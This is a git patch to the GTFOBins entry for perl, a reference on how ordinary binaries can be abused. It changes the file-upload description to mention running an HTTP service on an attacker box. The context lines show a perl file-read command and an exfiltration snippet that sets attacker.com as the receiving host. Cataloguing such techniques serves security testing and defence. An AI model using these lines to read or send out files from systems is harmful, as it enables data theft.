From 099d25e9b968b8e32a9cee4d1be7b8d830620118 Mon Sep 17 00:00:00 2001 From: Dmitrijs Trizna Date: Thu, 5 Oct 2023 11:59:58 +0200 Subject: [PATCH] Update perl.md --- _gtfobins/perl.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md index 92dd290..6f92a72 100644 --- a/_gtfobins/perl.md +++ b/_gtfobins/perl.md @@ -7,7 +7,7 @@ functions: LFILE=file_to_read perl -ne print $LFILE file-upload: - - description: Send local file via "d" parameter of a HTTP POST request. + - description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file. code: | export RHOST=attacker.com export RPORT=8080